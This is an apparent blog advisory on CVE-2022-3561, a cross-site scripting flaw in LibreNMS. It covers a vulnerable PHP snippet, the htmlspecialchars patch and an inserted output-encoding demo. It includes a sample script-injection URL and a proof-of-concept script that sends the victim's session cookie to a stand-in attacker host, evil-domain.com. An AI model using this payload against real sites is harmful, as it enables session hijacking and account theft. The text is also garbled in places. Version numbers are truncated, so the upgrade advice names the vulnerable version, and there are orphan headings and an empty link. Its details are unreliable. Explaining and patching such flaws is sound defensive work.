In October 2022, a critical security vulnerability was discovered in the popular network monitoring tool LibreNMS. If you are using LibreNMS version 22.10. or earlier, your system might be at risk due to CVE-2022-3561—a Cross-Site Scripting (XSS) vulnerability. This exclusive article will help you understand what the flaw is, how it works, and how you can protect your systems.
What is CVE-2022-3561?
CVE-2022-3561 is a _generic Cross-site Scripting (XSS)_ vulnerability found in the web interface of LibreNMS up to version 22.10.. XSS bugs allow attackers to inject malicious scripts into web pages viewed by other users. The root cause is improper filtering of user-supplied data rendered by the application.
Official advisory: NVD - CVE-2022-3561
Modifying displayed content
If your LibreNMS instance is accessible by others, especially over the internet or a large internal network, this vulnerability makes your users and infrastructure a potential target.
Vulnerable Code Area
Based on the information from the GitHub Advisory and LibreNMS's release notes, user-supplied input such as device names or custom SNMP attributes was not properly sanitized. Below is a simplified and anonymized example to illustrate the vulnerability:
<!-- Vulnerable code snippet -->
<td><?php echo $_GET['device']; ?></td>
If a user visits
https://example.com/device.php?device=<script>alert('XSS');</script>
the <script> tag is injected directly into the HTML and executes in the victim’s browser.
https://librenms.example.com/device.php?device=
User Clicks the Link
When a legitimate user with an active LibreNMS session clicks on this link, the malicious JavaScript runs in their browser.
The Malicious Script Steals Their Cookie
The <script> in this case sends the user's session cookie to the attacker’s server, allowing the attacker to hijack the user’s session.
Here’s a simple proof-of-concept attack:
// Inserted by the attacker
<script>
fetch('https://evil-domain.com/steal?cookie='+document.cookie);
</script>
Real Patch: How Did LibreNMS Fix It?
LibreNMS fixed this by escaping output using PHP’s htmlspecialchars function, which renders special characters like <, >, and " as harmless HTML entities:
<td><?php echo htmlspecialchars($_GET['device'], ENT_QUOTES, 'UTF-8'); ?></td>
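The same output-encoding fix, as an added example that is not from the original article or from LibreNMS's code: a hypothetical helper `e()` wraps `htmlspecialchars` and is run over constructed inputs. It assumes PHP 8 and goes slightly beyond the one-line fix by also covering a single-quoted attribute, invalid UTF-8, and an array-valued parameter.

```php
<?php
declare(strict_types=1);

// Hypothetical helper, not LibreNMS code: encode a request value for HTML
// text or a quoted attribute value.
function e(mixed $value): string
{
    // ?device[]=x turns $_GET['device'] into an array; render non-scalars as empty.
    if (!is_scalar($value)) {
        return '';
    }
    // ENT_QUOTES encodes both ' and "; ENT_SUBSTITUTE replaces invalid UTF-8
    // with U+FFFD instead of making htmlspecialchars return an empty string.
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs standing in for $_GET['device'].
$samples = [
    'plain name'    => 'core-sw-01',
    'page payload'  => "<script>alert('XSS');</script>",
    'quote in name' => "O'Neil rack \"A\"",
    'invalid UTF-8' => "sw\xC3\x28",
    'array param'   => ['x'],
];

foreach ($samples as $label => $device) {
    // Element content: the context of the article's <td> example.
    $cell = '<td>' . e($device) . '</td>';
    // Single-quoted attribute: safe only because ' is encoded as well.
    $attr = "<input name='device' value='" . e($device) . "'>";
    // For comparison: ENT_COMPAT leaves ' untouched, so a quote in the
    // value would close this attribute early.
    $raw  = is_string($device) ? $device : '';
    $weak = "<input name='device' value='" . htmlspecialchars($raw, ENT_COMPAT, 'UTF-8') . "'>";

    printf("[%s]\n  cell: %s\n  attr: %s\n  weak: %s\n", $label, $cell, $attr, $weak);
}
```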
Upgrade immediately to LibreNMS 22.10. or later.
Download the latest release here.
References and Further Reading
- Official NVD Entry
- GitHub Advisory
- LibreNMS Release Notes v22.10.
- OWASP XSS Prevention Cheat Sheet
Conclusion
CVE-2022-3561 is a serious XSS vulnerability in LibreNMS. If you manage IT infrastructure with LibreNMS, patch your systems as soon as possible and review your settings. Following best practices for input validation and output encoding can help secure your apps and your users.
Timeline
Published on: 11/20/2022 05:15:00 UTC
Last modified on: 11/21/2022 13:10:00 UTC